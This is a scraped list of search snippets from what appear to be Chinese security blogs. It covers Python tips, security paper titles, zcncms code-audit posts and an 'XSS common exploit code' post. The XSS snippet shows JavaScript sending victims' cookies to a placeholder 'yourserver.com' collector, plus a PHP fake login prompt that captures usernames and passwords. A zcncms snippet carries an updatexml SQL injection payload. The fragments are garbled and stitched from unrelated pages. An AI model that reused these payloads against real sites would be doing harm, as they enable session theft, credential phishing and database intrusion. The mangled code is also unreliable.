blog.ourren.com
Python中的常用代码 - Ourren
http://blog.ourren.com/2015/07/19/pythonzhong-de-chang-yong-dai-ma
Input first = [1,2,3,4,5] second = [6,7,8,9,10] #output three = [7,9,11,13,15] # The zip function is useful here, used with a list comprehension. # add [x y for x, y in zip(first, second)] # other [x*y for x, y in zip(first, second)] [max(x,y) for x, y in zip(first, second)]. In list = ['1', '2', '1', '3'] in list = list(set(in list). From collections import Counter A = Counter({'a':1, 'b':2, 'c':3}) B = Counter({'b':3, 'c':4, 'd':5}) A B Counter({'c': 7, 'b': 5, 'd': 5, 'a': 1}). 20 could be change to a...
blog.ourren.com
Blog Archive - Ourren
http://blog.ourren.com/blog/archives
Measuring and Detecting Malware Downloads in Live Network Traffic. Understanding and Monitoring Embedded Web Scripts. Detecting Spammers on Twitter. On the Relations Between the Different Actors in the Spam Landscape. On the Arms Race in Spamming Botnet Mitigation. SecWiki:Latest Security Articles and Tools. Eyefoo Remove Ad Patch. Php Webshell Scan Tool. 编解码工具 DEncode1.1 更新. Practical Malware Analysis Chapter5 Summary. Practical Malware Analysis Part1总结.
wps2015.org
Category: 漏洞分析 | wps2015的博客
http://wps2015.org/categories/漏洞分析
wps2015.org
代码审计——zcncms后台SQL注入(一) | wps2015的博客
http://wps2015.org/2016/08/05/code-audit-of-zcncms1
If( strlen($ k) 0 & eregi(' (GLOBALS)',$ k) ). Preg match( '/ (GLOBALS)/i'. Request var not allow! Foreach(Array(' GET',' POST',' COOKIE') as $ request) 取消cookie自动生成变量. K = $ v) {. Strstr($ k, ' '. 123;$ k} = GetRequest($ v);. 过滤变量的key是 p 和 GLOBALS p 的形式,防止全局变量覆盖 并在函数. Time = time();. Id = intval($id);. Infoold = $menus- GetInfo( '. 123; / 毫无意义的比较. List = $menus- GetList( '. Parentid = $id ". Parent = $menus- GetInfo( '. Parentid); / 没有单引号. 0x03 全局过滤 08sec ids. Db string,$querytype= 'select'. Old pos = 0.
wps2015.org
Tag: php | wps2015的博客
http://wps2015.org/tags/php
wps2015.org
Tag: python | wps2015的博客
http://wps2015.org/tags/python
wps2015.org
XSS常见利用代码及原理 | wps2015的博客
http://wps2015.org/2016/12/12/usually-used-xss-code
Elesrc = "http:/ yourserver.com/xss/xss cookie/cookie1.php? Time; / cookie获取. Xml = ajax(); / 实例化ajax请求对象. Url = "http:/ yourserver.com/xss/xss cookie/cookie1.php? 若要传递的数据量较大,可利用 POST方法 xml.open("POST",url,true);xml.send("cookie=" cookie "&location=" locations);. Http:/ 192.168.1.1". SERVER[ 'PHP AUTH PW'. SERVER[ 'PHP AUTH USER'. Header( 'WWW-Authenticate: Basic realm="info you want"'. Header( 'HTTP/1.0 401 Unauthorized'. User = $ SERVER[ 'PHP AUTH USER'. Pass = $ SERVER[ 'PHP AUTH PW'. E1value = user;.
wps2015.org
Category: 代码审计 | wps2015的博客
http://wps2015.org/categories/代码审计
wps2015.org
LNScan--一个高效的信息探测脚本 | wps2015的博客
http://wps2015.org/2016/07/28/LNScan
对于信息安全工作者,快速了解一个ip段、ip列表或者域名列表的信息 端口、标题、敏感文件等 ,是进行安全检测的重要一环,LNScan正是为此而生,敏感文件扫描模块改自 BBScan. Ip段/文件 = title&常见端口扫描 = 提取web端口 = 敏感文件扫描 = 生成report.
wps2015.org
代码审计——zcncms几处漏洞合集(二) | wps2015的博客
http://wps2015.org/2016/08/09/code-audit-of-zcncms2
Where = ' 1 = 1 '. Where = " productid = '". Productid. "' ". Time = time();. Id = intval($id);. Infoold = $products photo- GetInfo( '. Productinfo = $products- GetInfo( '. Where = productid = .$productid. Products- GetInfo(, id = .$productid). Http:/ 127.0.0.1:8088/code audit/zcncms/admin/? Submit=&productid=12=@` '` and 1=(updatexml(1,concat(0x5e24,(select user() ,0x5e24),1) ;#@` '`. 在后台登陆文件 /include/admincontroller/login.php中,进行登陆是否成功后,设置模板文件为’login.tpl.php’. Loginerror = '用户名密码错误,请重新登陆.'. 将$sys[ clos...